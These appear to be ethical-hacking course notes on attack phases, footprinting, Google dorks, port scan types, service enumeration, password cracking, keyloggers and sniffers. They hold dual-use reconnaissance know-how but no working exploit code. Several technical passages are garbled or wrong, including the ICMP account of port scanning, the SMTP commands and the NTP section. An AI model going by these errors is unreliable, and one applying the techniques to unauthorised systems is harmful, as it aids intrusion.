UNIT I

ETHICAL HACKING OVERVIEW & VULNERABILITIES

Understanding the the importance of security-concept of ethical

hacking and essential terminologies threat:
Ethical hacking, also known as penetration testing or white-hat hacking, refers to the
practice of intentionally probing computer systems, networks, or applications for
vulnerabilities and security weaknesses. The primary objective of ethical hacking is to
identify and address potential security threats before malicious hackers can exploit them.
Ethical hackers, often employed by organizations or hired as consultants, use their knowledge
and skills to assess the security posture of a system, network, or application and provide
recommendations for improving cybersecurity.
Ethical hacking is used for various purposes, all of which revolve around improving
the security of computer systems, networks, and applications. Here are some key uses of
ethical hacking:

 Identifying Vulnerabilities
Ethical hackers systematically search for weaknesses and vulnerabilities in software,
hardware, and network configurations. By doing so, they can pinpoint potential entry
points for cyberattacks.
 Assessing Security Posture:
Ethical hacking helps organizations assess their current security posture. This involves
understanding how well their defenses hold up against real-world hacking attempts.
 Risk Mitigation
Ethical hacking assists in identifying and prioritizing security risks. Organizations can
then mitigate these risks, reducing the likelihood of data breaches and cyberattacks.

 Compliance and Regulation

Many industries and organizations are subject to specific security standards and
regulations. Ethical hacking can help ensure compliance with requirements like the
Payment Card Industry Data Security Standard (PCI DSS), the Health Insurance
Portability and Accountability Act (HIPAA), or the General Data Protection
Regulation (GDPR).

 Security Awareness and Training:

Ethical hacking findings can be used to educate employees and users about
cybersecurity best practices and potential threats. This helps foster a security-
conscious culture within an organization.
 Incident Response Planning: Understanding vulnerabilities through
ethical hacking can assist organizations in developing robust incident
 response plans. This ensures they are prepared to react effectively in a
security breach.
 Secure Software Development: Ethical hacking can be applied during
the development phase of software and applications to uncover and
address security flaws before they reach production.
 Third-Party Assessment: Organizations often work with third-party
vendors and service providers. Ethical hacking can be used to evaluate
the security of these external entities to ensure they meet security
requirements.
 Penetration Testing: Ethical hackers conduct penetration tests,
simulating real-world attacks to assess how well a system can withstand
hacking attempts. This helps organizations understand their
vulnerabilities and prioritize improvements.
 Continuous Improvement: Ethical hacking is an ongoing process. It
regularly monitors and evaluates an organization's security posture,
adapting to evolving threats and technologies.

Attack:
In ethical hacking, various types of attacks are employed to identify and address
vulnerabilities in systems. Common examples include:
1. Phishing Attacks: Simulating deceptive emails or messages to trick users
into revealing sensitive information.
2. SQL Injection: Exploiting vulnerabilities in database queries to gain
unauthorized access or manipulate data.
3. Cross-Site Scripting (XSS): Injecting malicious scripts into web pages
viewed by other users to compromise their data.
4. Man-in-the-Middle (MitM) Attacks: Intercepting and altering
communication between two parties to gain unauthorized access or manipulate
data.
5. Denial of Service (DoS) Attacks:Overloading a system or network to disrupt
its normal functioning and make it unavailable.
6. Buffer Overflow Attacks:Exploiting programming errors to overflow a
program's memory and execute malicious code.
7. Password Attacks: Attempting to crack passwords through methods like
brute force or dictionary attacks.
8. Social Engineering: Manipulating individuals to disclose confidential
information through psychological tactics.
9. Network Scanning: Identifying open ports, services, and vulnerabilities in a
network to assess security.
Ethical hackers use these techniques responsibly, with explicit permission, to
help organizations strengthen their security posture.

Vulnerabilities:
1. Security Misconfigurations
Security misconfigurations happen when an organization improperly configures or
fails to properly utilize all of a system’s security settings, enabling hackers to gain
access to its network. A security misconfiguration is often a precursor to a powerful
and aggressive attack on a network. Programs like the C|EH train ethical hackers to
spot security misconfigurations and then provide recommendations for how a
business can remedy them.
2. Injection Attacks
In an injection attack, a malicious actor injects a line of code into a program to gain
remote access to an organization’s network (IBM, 2014). Injection attacks are often
precursors to larger-scale cyberattacks on a database or website (IBM, 2014).
However, appropriate security protocols can stop the malicious injection of code and,
if enforced correctly, alert a network administrator. There are many types of injection
attacks, with SQL injections among the most prevalent and damaging.
3. Vulnerable System Components
One of the fundamental challenges in network security is ensuring that all aspects of
a network’s systems are secure and up to date—a network is only as secure as its
individual components. Using components with known vulnerabilities can create
serious network security problems. Ethical hackers can identify these vulnerabilities
and determine how to fix them. These fixes may include making improvements to
existing security programs and providing recommendations for better security
software.
4. Social Engineering
Malicious actors use social engineering tactics to break into an organization’s
network by inducing individuals to provide information that enables the hacker to
gain illicit access to the organization’s systems (National Institute of Standards and
Technology, n.d.). Social engineering attacks may involve, for example, a malicious
actor posing as a network administrator and sending out a phishing email to an
organization’s members. If users are tricked into giving out their usernames and
passwords, the attacker can gain unlawful access to the company’s network.
Ensuring that employees are aware of social engineering and phishing techniques
can lower the odds that such attacks will be successful (EC-Council, 2021a). A
company is only as strong as its weakest link. Ethical hacking can help identify these
weak links.
5. Authentication Vulnerabilities
Although every network has an authentication process, some networks have
particular vulnerabilities that allow a skilled hacker to bypass these authentication
measures and breach the network. A C|EH is trained to know what these
vulnerabilities are, where to find them, and how to spot them.

Target of Evaluation Exploit:

In ethical hacking, when dealing with a Target of Evaluation (TOE), the goal is
to identify and exploit vulnerabilities within the TOE for the purpose of
assessing its security. This involves simulating real-world attack scenarios to
evaluate the system's defenses.
Ethical hackers perform controlled and authorized exploits to:
1. Identify Weaknesses: Discover vulnerabilities that could be exploited by
malicious actors.
2. Evaluate Defenses: Assess the effectiveness of security measures in place.
3. Provide Recommendations: Offer insights and recommendations to
strengthen the security of the TOE.
It's crucial to conduct such activities within a well-defined scope, with explicit
permission, and in alignment with legal and ethical standards. The ultimate aim
is to enhance the security of the system by addressing and mitigating identified
vulnerabilities.
Phases involved in hacking:
There are mainly 5 phases in hacking. Not necessarily a hacker has to follow
these 5 steps in a sequential manner. It’s a stepwise process and when followed
yields a better result.
1. Reconnaissance:
This is the first step of Hacking. It is also called as Footprinting and information
gathering Phase. This is the preparatory phase where we collect as much
information as possible about the target. We usually collect information about
three groups,
 Network
 Host
 People involved
There are two types of Footprinting:
Active
Directly interacting with the target to gather information about the target. Eg
Using Nmap tool to scan the target
Passive: Trying to collect the information about the target without directly
accessing the target. This involves collecting information from social media,
public websites etc.
2. Scanning:
Three types of scanning are involved:
Port scanning: This phase involves scanning the target for the information like
open ports, Live systems, various services running on the host.
Vulnerability Scanning: Checking the target for weaknesses or vulnerabilities
which can be exploited. Usually done with help of automated tools
Network Mapping: Finding the topology of network, routers, firewalls servers if
any, and host information and drawing a network diagram with the available
information. This map may serve as a valuable piece of information throughout
the haking process.
3. Gaining Access:
This phase is where an attacker breaks into the system/network using various
tools or methods. After entering into a system, he has to increase his privilege to
administrator level so he can install an application he needs or modify data or
hide data.
4. Maintaining Access:
Hacker may just hack the system to show it was vulnerable or he can be so
mischievous that he wants to maintain or persist the connection in the
background without the knowledge of the user. This can be done using Trojans,
Rootkits or other malicious files. The aim is to maintain the access to the target
until he finishes the tasks he planned to accomplish in that target.
5. Clearing Track:
No thief wants to get caught. An intelligent hacker always clears all evidence so
that in the later point of time, no one will find any traces leading to him. To
achieve this, the hacker focuses on modifying/corrupting/deleting the values of
Logs, altering registry values, uninstalling all applications used, and deleting all
folders created. In the event of a compromised site, it becomes crucial to
promptly address and fix the hacked site to minimize potential damage and
prevent further unauthorized access

Unit-II
Footprinting
Footprinting means gathering information about a target system that can be
used to execute a successful cyber attack. To get this information, a hacker
might use various methods with variant tools. This information is the first road
for the hacker to crack a system. There are two types of footprinting as following
below.
 Active Footprinting: Active footprinting means performing footprinting by
getting in direct touch with the target machine.
 Passive Footprinting: Passive footprinting means collecting information
about a system located at a remote distance from the attacker.
Different kinds of information that can be gathered from Footprinting are
as follows:
 The operating system of the target machine
 Firewall
 IP address
 Network map
 Security configurations of the target machine
 Email id, password
 Server configurations
 URLs
 VPN
Sources are as follows:
 Social Media: Most people have the tendency to release most of their
information online. Hackers use this sensitive information as a big deal. They
may create a fake account for looking real to be added as friends or to follow
someone’s account for grabbing their information.

 JOB websites: Organizations share some confidential data on many JOB

websites like [Link]. For example, a company posted on a
website: “Job Opening for Lighttpd 2.0 Server Administrator”. From this,
information can be gathered that an organization uses the Lighttpd web
server of version 2.0.

 Google: Search engines such as Google have the ability to perform more
powerful searches than one can think and one had gone through. It can be
used by hackers and attackers to do something that has been
termed Google hacking. Basic search techniques combined with advanced
operators can do great damage. Server operators exist like
“inurl:”,”allinurl:”,”filetype:”, etc.
For example, devices connected to the Internet can be found. A search
string such as inurl: “ViewerFrame?Mode=” will find public web cameras.
“The “link:” search operator that Google used to have, has been turned off by
now (2017)”.
Google can be used to uncover many pieces of sensitive information that
shouldn’t be revealed. A term even exists for the people who blindly post this
information on the internet, they are called “Google Dorks”.

 Social Engineering: There are various techniques that fall in this category.
A few of them are:

 Eavesdropping: The attacker tries to record the personal conversation of

the target victim with someone that’s being held over communication
mediums like the Telephone.
 Shoulder Surfing: In this technique, Attacker tries to catch the personal
information like email id, password, etc; of the victim by looking over the
victim’s shoulder while the same is entering(typing/writing) his/her personal
details for some work.

 [Link]: The Archived version refers to the older version of the website
which existed a time before and many features of the website have been
changed. [Link] is a website that collects snapshots of all the websites
at a regular interval of time. This site can be used to get some information
that does not exist now but existed before on the site.

 An Organization’s Website: It’s the best place to begin for an attacker. If an

attacker wants to look for open-source information, which is information
freely provided to clients, customers, or the general public then simply the
 best option is: “ORGANISATION’s WEBSITE”.

 Using Neo Trace: NeoTrace is a powerful tool for getting path information.
The graphical display displays the route between you and the remote site,
including all intermediate nodes and their information. NeoTrace is a well-
known GUI route tracer program. Along with a graphical route, it also
displays information on each node such as IP address, contact information,
and location.

 Who is: This is a website that serves a good purpose for Hackers. Through
this website information about the domain name, email-id, domain owner,
etc; a website can be traced. Basically, this serves as a way for Website
Footprinting.
Advantages:
 Footprinting allows Hackers to gather the basic security configurations of a
target machine along with network route and data flow.
 Once the attacker finds the vulnerabilities he/she focuses on a specific area
of the target machine.
 It allows the hacker to identify as to which attack is handier to hack the target
system.
Counter Measures:
 Avoid posting confidential data on social media websites.
 Avoid accepting unwanted friend requests on social media platforms.
 Promotion of education on various hacking tricks.
 Usage of footprinting techniques for identifying and removing sensitive
information from social media platforms.
 Proper configuration of web servers to avoid loss of information about
system configuration.

Methods of Information Gathering

There are the following three methods of information gathering:

1. Footprinting
2. Scanning
3. Enumeration

Footprinting

In this technique, the information of a target network or system or victim is collected as

much as possible. Footprinting provides various ways to intrude on the system of an
organization. The security posture of the target is also determined by this technique. It
can be active as well as passive. In Passive footprinting, the information of any user is
collected without knowing him. If the user's sensitive information gets released
intentionally and consciously or by the direct contact of the owner, active footprinting
will be created.
Footprinting techniques are three types. These are as follows:

o Open source footprinting

o Network-based footprinting
o DNS interrogation

Open source footprinting

Open source footprinting is the safest footprinting. The limitation of footprinting is
illegal. It is illegal; that's why hackers can do open source footprinting without fear.
Examples of open source footprinting include DOB, phone number, search for the age,
finding someone's email address, using an automation tool scans the IP, etc. Most
companies provide information on their official websites related to their company.
Hackers will use the information provided by the company and take benefit from them.

Network-based Footprinting
Network-based footprinting is used to retrieve information like network service,
information name within a group, user name, shared data among individuals, etc.

DNS interrogation
After gathering all the required information on various areas using different techniques,
the hacker uses the pre-existing tools to query the DNS. DNS interrogation is performed
by many freeware online tools.

Objectives of Footprinting
Network Information collection: Footprinting is used to collect the information about
the network like protocol used, authentication mechanism, internal domain name,
domain name, existing VPNs, system enumeration, digital and analog telephone number,
IP address of the reachable system, etc.

System information collection: Footprinting is used to collect information about the

system like group names and users, routing protocol, routing table, operating system
used, system banners, SNMP information, remote system type, system architecture,
username, and passwords.

Organization information collection: Footprinting is used to collect information about

an organization like employee details, local details, security policies implemented,
company directory, address and phone numbers, organization's website, organization's
web server links comments in HTML source code, news articles and press release.
Scanning

Another essential step of footprinting is scanning, which contains the package of

techniques and procedures. In the network, hosts, ports and various services are
identified by it. It is one of the components of information gathering mechanism and
intelligence gathering, which is used by an attacker to create an overview scenario of the
target. To find out the possibility of network security attacks, pen-testers use
vulnerability scanning. Due to this technique, hackers can find vulnerabilities like weak
authentication, unnecessary services, missing patches, and weak encryption algorithms.
So an ethical hacker and pen-tester provide the list of all vulnerabilities they found in an
organization's network.

There are three types of scanning

o Port scanning
o Network scanning
o Vulnerability scanning

Port scanning
Hackers and penetration testers use this conventional technique to search for open
doors so that the hackers can access the system of any organization. Hackers need to
identify the live hosts, topology of the target organization, firewall installed, different
devices that are attached to the system, operating system used, etc., during this scan.
Once the hacker fetches the IP address of the victim organization by scanning ports
of UDP (user datagram protocol) and TCP (transmission control protocol), they map the
organization's network under his grab. Port scanning is performed by the Amap tool.

Network scanning
You should understand the process of 3-way TCP/IP handshaking before learning the
vulnerability scanning techniques. Handshaking is the automated process in which
communication between two entities is set using some protocols. To provide
handshaking between the server and client, two protocols, TCP and IP, are used. A
synchronized packet sends by the client to establish a connection. The server listens to
the packet and responds to the client with a syn/ack packet. The client again responds
by sending the ack packet to the server. The initialized connection between server and
client in packets is denoted by SYN (synchronization). The establishment of a connection
between hosts is denoted by ACK.

There are various scans used by scanning techniques, which are as follows:

SYNScan: The three-way handshaking technique of TCP is not completed by an SYN

scan or stealth. An SYN packet is sent by the hacker to the target, and if the hacker
receives back the SYN/ACK frame, the connection would be completed by the target,
and the port is able to listen anything. If the target retrieves the RST, it will assume that
the ports are not activated or closed. Some IDS system logs this as connection attempts
or an attack that why SYN stealth scan is advantageous.

XMASScan: This scan is used to send the packet containing PSH, FIN, and URG flags. The
target will not provide any response if the port is open. But an RST/ACK packet is
responded by the target if the port is closed.

FINScan: XMAS scan and FIN scan is almost the same except that it does not send a
packet with PSH and URG flags; it only sends packets with a FIN flag. The response and
the limitations of the FIN scan are the same as the XMAS scan.

IDLEScan: This scan determines the sequence number of IP header and port scan
response and sends the SYN packet to the target using the spoofed/hoax IP. The port is
open or not depends upon the response of the scan.

Inverse TCP Flag scan: In this scan, the TCP probe packet with no flags or TCP flags
send by the attacker. If the target does not provide any response, it means the port is
open. If the RST packet is responded by the target, it means the port is closed.

ACK Flag Probe Scan: In this scan, TCP probe packets are sent by the attacker where the
ACK flag is set to a remote device, analyzing the header information. The port is open or
not signified by the RST packet. This scan also checks the filtering system of the victim or
target.

ADVERTISEMENT

Vulnerability scanning
Vulnerability scanning is a proactive identification of Vulnerabilities on the target
network. Using some automatic scanning tools and some manual support,
vulnerabilities, and threats can be identified. To provide vulnerability scanning, the
computer should have an internet connection.

The ports and network can be scanned by the following tools:

ADVERTISEMENT

ADVERTISEMENT

Nmap: It is used to extract information like operating system, packet filters or firewall
type, live host on network, version of the operating system.

Angry IP scanner: It is used to scan for systems availability within the given range of
input.

Hping2/Hping3: They are network scanning tools and command-line packet crafting.
TCP/IP protocols use them.
Superscan: Macfee, which is a TCP port scanner, develops this powerful tool. A super
scan is used for pinging.

ZenMap: ZenMap is a very powerful GUI tool. It is used to detect the port scanning, ping
sweep, OS type, version of OS, etc.

Net scan Tool: It contains different types of tools. It is used to perform the web rippers,
flooding, mass emailers, port scan. This tool is available as a trial version, but it is also
has a paid version.

Objective of Network scanning

o Network scanning is used to find the open ports, live hosts, IP address of the
target.
o Network scanning is used to find the services which are running on the computer
of a target.
o Network scanning is used to find the system architecture and operating system of
the victim.
o Network scanning is used to find and deal with vulnerabilities.

Enumeration

Enumeration is the process in which information is extracted from the system like
machine names, user names, network resources, shares and services. In enumeration, an
active connection is established with the system by the hacker. Hackers use this
connection and gain more target information by performing direct queries. If the
attacker wants to directly exploit the system, the outcome of the enumeration phase is
very useful for them. That's why, in penetration testing, the enumeration phase is
considered risky.

There are various types of enumeration. These are as follows:

NetBIOS Enumeration: NetBIOS means Network Basic Input Output System. It is

developed by IBM. If you want to enumerate NetBIOS on Windows OS, printer and file
server should be enabled. Using NetBIOS, an attacker can perform a DOS attack on a
remote machine.

SNMP Enumeration: SNMP means Simple Network Management Protocol. If the

network device is run on Internet Protocol (IP) like a router, SNMP will be used for
managing the device. It is based on the client-server architecture. Every network device
has the SNMP client or agent, and using the request and response; it communicates with
the SNMP managing station. Agent software can access the SNMP request and response,
which are the configurable variable. Using the SNMP enumeration, an attacker can get
information on network resources like devices, shares, routers, etc. An attacker can get
device-specific information, traffic statistics, and ARP and Routing table by enumerating
the SNMP on the remote device.

LDAP Enumeration: LDAP means Light Weight Directory Access Protocol. It is based on
the client-server architecture. The distributed directory services can be accessed by
LDAP. Directory service is used for storing user's records, and it is a logical and
hierarchical structure. Using the BER (Basic Encoding Rules), the information transmits
between server and client. The LDAP transmits over TCP (Transmission control protocol).
If the server has an anonymous remote query, LDAP supports it. Using the query, the
sensitive information of users like contact details, address, user name, department
details, etc., can be accessed.

NTP Enumeration: NTP means Network time protocol. Clocks of network computers are
synchronized by the NTP. If NTP is in ideal condition, it can achieve 200 milliseconds
accuracy in the local area network. It is based on agent-server architecture. It works on
port 123 and UDP (user datagram protocol). The NTP server is queried by the NTP agent.
If the attacker queries the NTP server, they can enumerate the host's list, which is
connected to the server of NTP. They can also enumerate the operating system,
hostname and IP address of the internal clients.

SMTP Enumeration: SMTP means Simple Mail Transfer protocol. It is used to transmit
electronic mail. It is based on the client-server architecture. It works on port number 25
and TCP (Transmission control protocol). To send the mail through DNS, it will use the
MX server (Mail exchange server). The following built-in commands are given by SMTP:

VERY: In the SMTP server, this command validates the users.

EXPN: It is used to identify the list of mails and deliver the address of aliases.

RECT TO: It is used to define the message's recipients.

The response of the SMTP server towards the above command is different. Because of
the varied response of SMTP, SMTP enumeration is possible. Using the same technique,
an attacker can find a valid user on the server of SMTP.

DNS Enumeration: DNS means Domain name service. DNS is used to store the record
using the DNS database. In DNS, the most commonly used types of record are as
follows:

o Domain name aliases

o IP Address
o Nameservers
o Start of authority
o Pointers for reverse DNS lookups
 o Mail exchange

DNS works on TCP (Transmission control protocol) as well as UDP (User datagram
protocol). It uses port number 53. In DNS, TCP is used for zone transfer, and UDP is used
for resolving queries. The database's position can be replicated from the primary server
to the secondary server using the DNS zone transfer. DNS enumeration is possible when
the DNS primary server is requested by the zone transfer and pretends like a client. In
response to the request, it reveals the sensitive information related to domain records.

ADVERTISEMENT

Windows Enumeration: Windows Os and Sysinternals tools can be enumerated

together. You can download the many more Sysinternals tools using the
URL [Link]

LINUX/UNIX Enumeration: Linux or Unix OS and Multiple command-line utilities can be

enumerated together. The utilities are provided by the operating system.

Phases of Hacking

There are mainly 5 phases in hacking. Not necessarily a hacker has to follow these 5
steps in a sequential manner. It’s a stepwise process and when followed yields a better
result.
1. Reconnaissance:

This is the first step of Hacking. It is also called as Footprinting and information gathering
Phase. This is the preparatory phase where we collect as much information as possible
about the target. We usually collect information about three groups,

1. Network
2. Host
3. People involved

There are two types of Footprinting:

 Active: Directly interacting with the target to gather information about the target.
Eg Using Nmap tool to scan the target
 Passive: Trying to collect the information about the target without directly
accessing the target. This involves collecting information from social media,
public websites etc.

2. Scanning:

Three types of scanning are involved:

 Port scanning: This phase involves scanning the target for the information like
open ports, Live systems, various services running on the host.
 Vulnerability Scanning: Checking the target for weaknesses or vulnerabilities
which can be exploited. Usually done with help of automated tools
 Network Mapping: Finding the topology of network, routers, firewalls servers if
any, and host information and drawing a network diagram with the available
information. This map may serve as a valuable piece of information throughout
the haking process.

3. Gaining Access:

This phase is where an attacker breaks into the system/network using various tools or
methods. After entering into a system, he has to increase his privilege to administrator
level so he can install an application he needs or modify data or hide data.

4. Maintaining Access:

Hacker may just hack the system to show it was vulnerable or he can be so mischievous
that he wants to maintain or persist the connection in the background without the
knowledge of the user. This can be done using Trojans, Rootkits or other malicious files.
The aim is to maintain the access to the target until he finishes the tasks he planned to
accomplish in that target.

5. Clearing Track:

No thief wants to get caught. An intelligent hacker always clears all evidence so that in
the later point of time, no one will find any traces leading to him. To achieve this, the
hacker focuses on modifying/corrupting/deleting the values of Logs, altering registry
values, uninstalling all applications used, and deleting all folders created. In the
event of a compromised site, it becomes crucial to promptly address and fix the hacked
site to minimize potential damage and prevent further unauthorized access.

Port Scan in Ethical Hacking

Port Scanning is the name of the technique used to identify available ports and
services on hosts on a network. Security engineers sometimes use it to scan
computers for vulnerabilities, and hackers also use it to target victims. It can be
used to send connection requests to target computers and then track ports.
Network scanners do not actually harm computers; instead, they make requests
that are similar to those sent by human users who visit websites or connect to
other computers using applications like Remote Desktop Protocol (RDP) and
Telnet. A port scan is performed by sending ICMP echo-request packets with
specific flags set in the packet headers that indicate the type of message being
transmitted: Type 8 indicates the request to be an echo-reply packet with the
source IP address as the responding host, while Type 0 indicates that no
response is expected from the responding host.

Types of Port Scans:

To protect your network from port scans, it is essential to understand the

different types of port scans used by hackers.
 Vanilla: The scanner tries to connect to all 65,535 ports ) – The scanner
looks for open UDP ports
 Sweep: The scanner pings an identical port on over one computer to
envision which pc is active
 FTP Bounce: The scanner goes through an FTP server to mask the source
 Stealth: The scanner locks scanned computer records Scan of port

Types of Ports:

 Open: The host replies and announces that it is listening and open for
queries. An undesired open port means that it is an attack path for the
network.
 Closed: The host responds but notices that no application is listening.
Hackers will scan again if it is opened.
 Filtered: The host does not respond to a request. This could mean that the
packet was dropped due to congestion or a firewall.

Tools Used in Port Scanning:

 Nmap
 Angry IP Scan
 Netcat
 Zenmap
 Advanced Port Scanner
 MASSCAN

ping sweep
A ping sweep (also known as an ICMP sweep) is a basic network
scanning technique used to determine which of a range of IP addresses map
to live hosts (computers).

Whereas a single ping will tell whether one specified host computer exists on
the network, a ping sweep consists of ICMP (Internet Control Message
Protocol) echo requests sent to multiple hosts. To do this, the ping requires an
address to send the echo request to, which can be an IP address or a web
server domain name.

If a given address is live, it will return an ICMP echo reply. To disable ping
sweeps on a network, administrators can block ICMP echo requests from
outside sources. However, ICMP timestamp and Address Mask requests can
be used in a similar manner.
NTP Enumeration is a process by which an attacker can discover NTP servers
on the network. This information can then be used to find vulnerable NTP
servers, or simply to further enumerate the network. Servers that are allowed
access from the internet usually have a much higher chance of being
exploitable. An attacker will often use both DNS and brute force methods to find
these servers, as well as using [Link] or Censys to find unprotected
devices.
Exploit Vulnerability:
While NTP servers are typically given special access to the network, they do not
always have to be on the same network. For example, an attacker may
compromise a server with an open port and use NTP to take a list of hosts that
are connected to him/her. The attacker can then send that list to scanners that
scan for vulnerable hosts. The difference between this and other types of
vulnerability is the amount of research involved and harder exploitation options.
This can be used against wireless networks because many manufacturers will
disable wireless access from their default factory settings. There are also less
obvious ways to use it as well, such as traffic mirroring.

Properties:
 Since NTP can be used to enumerate many hosts on a network, some basic
checks should be done before using it as an alternative route.
 “-NTP only” and “-NTP enabled” are easy checks that can often be done on a
simple server to identify if they are vulnerable or not.
 A “ping sweep” is another easy test that can often reveal which servers may
or may not be vulnerable, simply by sending packets from the attacker and
recording the reply from his/her victim.
 Many of these tests can also be automated with ping with tcpdump. There
are also many programs available for Nessus and OpenVAS that can scan
for vulnerabilities in NTP configurations.
 Nessus is a network security scanner available for most Operating Systems.
This program will run checks against a range of services. NTP should be
added to this list and the vulnerabilities will be identified by a plugin or rule.
This can often cause a short outage if downtime is required for maintenance,
updating software, repairing, etc.
 OpenVAS is an open-source vulnerability scanner that can scan networks for
common known vulnerabilities. It can also scan for many more obscure
vulnerabilities like NTP Enumeration and other issues that are not yet
documented in the official documentation.
 Several applications are available online that will automate vulnerability
scanning on OpenVAS (Stratumnscan, ASVScan).
NTP Security Model:
 NTP runs over UDP and TCP. NTP can also be sent via IP multicast, as well
as running on Layer 2 (Ethernet).
 NTP uses symmetric encryption with a shared key between each server and
client.
 There are two types of keys, Autokey, and Symmetric keys. Autokey is used
for broadcast communication. The source of the time message is known as a
“stratum 1” server, but since this system has been deprecated, many NTP
servers no longer use it. All modern servers use a Symmetric key for
communication between clients and servers.
 It uses only one type of packet, the NTP packet. The only difference between
the NTP and UDP and TCP packets is how they’re encrypted.
 The symmetric key is used for every packet sent by a client, it also allows
multicast communication, however multicast packets are less efficient
because of this.
 A client should use the local unicast IP address to identify itself in packets
(not the MAC address).
 The NTP packets contain a checksum and port number which is sent once,
upon connection.
 Firewalls need to be configured to allow NTP to operate properly.
 NTP can operate in non-authenticated or authenticated mode.
Important Points:
 In practice, the whole network is not required to be controlled by NTP; only
the first level of infrastructure.
 NTP should not be used in parallel to DNS.
 Network time can often be disabled in wrong configured devices, or over-
ridden in clients and servers.
 Servers should use different time sources, and clients should use the NTP
options to set their own source (otherwise the client might be vulnerable).
Conclusion:
NTP is an old protocol that reveals less information about the network, more
than other protocols. There are some types of vulnerabilities in NTP servers,
and even if it’s not a serious issue, it’s always better to at least make sure the
server is patched before connecting to it. Security expert Bruce Schneier says
this about NTP: “NTP has been used for years as a legitimate way to share
clock timing between devices so that they know what time it is and can be
synchronized. However, serious vulnerabilities have always been there and
remain today. Since they’re easy to exploit, NTP should be kept off the
corporate network.

Linux/Unix Tutorial
Linux tutorial provides basic and advanced concepts of Linux. Our Linux tutorial is designed
for beginners and professionals.

Linux is an open-source operating system. It is like Windows, Mac, Android, etc.

Unix is also an operating system like Linux. It is an commercial OS. It consists of three parts:
Kernal, Shell and Programs. Most of the Unix and Linux commands are similar in nature.

Our Linux tutorial includes all topics of Linux OS such as Linux commands, Directories,
Files, Man Pages, File Contents, File Permissions, shells, VI editor etc. There is also given
Linux interview questions to help you better understand the Linux operating system.

UNIT III
SYSTEM HACKING

Aspect of Remote password guessing:

Password guessing is the process of attempting to gain access to a system through the
systematic guessing of passwords (and at times also usernames) in an attempt to gain a login
to a target system. This is problematic in that it will generally create voluminous amounts of
both network traffic when conducted remotely and system logs.

This is in effect a “brute force” or dictionary style attempt to find the proverbial needle in the
haystack. The attacker or auditor as the case may be will succeed only in the event that strong
passwords are not used. This is one of the reasons that password complexity controls and
checks have been built into most modern operating systems. Many applications, including
those deployed on the Internet, do not use these types of controls. This is where tools such as
Brutus come into play.

The issue with this type of test is that it can result in account lockout. This is either an
accidental or intentional DoS (denial of Services) possibility when a username is tested many
thousands of times in a single minute. Even using “speed bump account locking”, the
username will be tested so many times that it will lock. An attacker who sees a difference
between valid account login attempts and thus can determine a valid username could do this
in spite for not gaining access to a system.

Password guessing is slow in comparison to cracking and it is unlikely that an attacker will
ever guess a “good” password with complexity and the speed bump lockout method using
this method. The attempt can also create large amounts of unusual network traffic. Not only
can this impact network performance, but it should be different to a standard network traffic
baseline. This is another reason why the creation of network baselines is important
Roles of Eavesdropping:
 Pickup devices pick up sounds or images, from the attached microphones and
video cameras, and then the attackers can convert them into an electrical format
to eavesdrop on targets. Attackers may also use mini amplifiers that help them in
minimizing the background noise.

 A transmission link between a sender and the receiver would be tapped to

eavesdrop. This can be done with the radiofrequency transmission or a wire,
which can include active or unused telephone lines, electrical wires, or
ungrounded electrical conduits. Some transmitters can operate continuously, but
another approach can be remote activation.
 A listening post is when we put bugs on telephones to hear the conversations
taking place. It uses triggers that records when a telephone is picked up to make
or take a call and it is automatically turned off when the call ends. Secure areas
where these recordings are monitored are known as listening posts. It can be
anywhere, and they have voice-activated equipment available to eavesdrop and
record every activity.

 It is easier for attackers to gain unauthorized access to user accounts when weak
passwords are used. It gives them a way to intrude into corporate systems and
networks. Cyber attackers use these to their advantage and access confidential
communication channels, intercepting activity, to listen in on conversations
between colleagues to steal confidential business data.

 Users who connect to open networks that do not require any password and do
not use encryption for the transmission of data provide an ideal situation for
attackers for eavesdropping. Attackers can easily monitor user activity and listen
to the communications that take place on the network.

Various methods of password cracking:

There are a number of methods that can be used to crack passwords. We will describe
the most commonly used ones below;

 Dictionary attack– This method involves the use of a wordlist to compare against
user passwords.
 Brute force attack– This method is similar to the dictionary attack. Brute force
attacks use algorithms that combine alpha-numeric characters and symbols to
come up with passwords for the attack. For example, a password of the value
“password” can also be tried as p@$$word using the brute force attack.
 Rainbow table attack– This method uses pre-computed hashes. Let’s assume that
we have a database which stores passwords as md5 hashes. We can create
another database that has md5 hashes of commonly used passwords. We can
then compare the password hash we have against the stored hashes in the
database. If a match is found, then we have the password.
 Guess– As the name suggests, this method involves guessing. Passwords such as
qwerty, password, admin, etc. are commonly used or set as default passwords. If
 they have not been changed or if the user is careless when selecting passwords,
then they can be easily compromised.
 Spidering– Most organizations use passwords that contain company information.
This information can be found on company websites, social media such as
facebook, twitter, etc. Spidering gathers information from these sources to come
up with word lists. The word list is then used to perform dictionary and brute
force attacks.

Keystroke loggers:
A keystroke logger, also known as a keylogger, is a software program or hardware device that logs
and records every keystroke input on a computer. Bad actors can use it to steal sensitive data like
passwords, financial information, and other confidential information. Keyloggers can also be used

legitimately by parents to monitor their kids’ online activities, and employers can use them to track
employees’ computer usage.

Keyloggers can be broken down into two distinct definitions:

 Keystroke logging: The process of recording and storing every key that’s pressed on
a keyboard.
 Keylogger tools: Devices or programs designed to log a user’s keystrokes.
In addition to recording keystrokes, keylogger software can also collect user data through other
methods, such as capturing screenshots, recording web searches and visits, and monitoring clipboard
activity.

2 types of keyloggers
Keyloggers are either hardware-based or software-based.

Hardware-based keyloggers
Hardware keyloggers are physical devices used to monitor and record a user’s activity on a computer.
These devices are plugged into the back of a computer keyboard and have their own internal memory.
The data is recorded directly to the device’s memory and can be retrieved later by the attacker.

Hardware keyloggers are more difficult to detect than software keyloggers, as they are hardly visible
on the computer’s system. To prevent hardware keyloggers from being installed, physically inspect
your computer’s ports and cables periodically for any suspicious devices that may have been installed
without your knowledge.

Software-based keyloggers
A software keylogger is a type of monitoring and tracking software that logs keystrokes from a
computer keyboard. These keystrokes are recorded and stored in an encrypted log file that the attacker
can access remotely.
Software keyloggers can be disseminated when you click on malicious links, download malware, visit
a website with dangerous code, or open files that have been infected with malware. Although more
easily detectable than hardware keyloggers, software-based keyloggers can be installed remotely,
without needing physical access to your system.

Understanding Sniffers:
Sniffers are programs or tools designed to intercept (capture) and analyze data
packets (information) transmitted between devices or computers on wired and wireless
networks. Essentially, these tools capture data packets, which are then analyzed and
converted into a format that users can understand. This enables users to inspect the contents
of these packets and extract valuable information such as credit card details. Wireshark,
NetworkMiner, Snort, Ethereal, TCPDump, etc., are well-known sniffer programs.

Sniffers are known by various names, such as network probes, wireless sniffers, packet
sniffers, ethernet sniffers, and packet analyzers, and are crucial in network management and
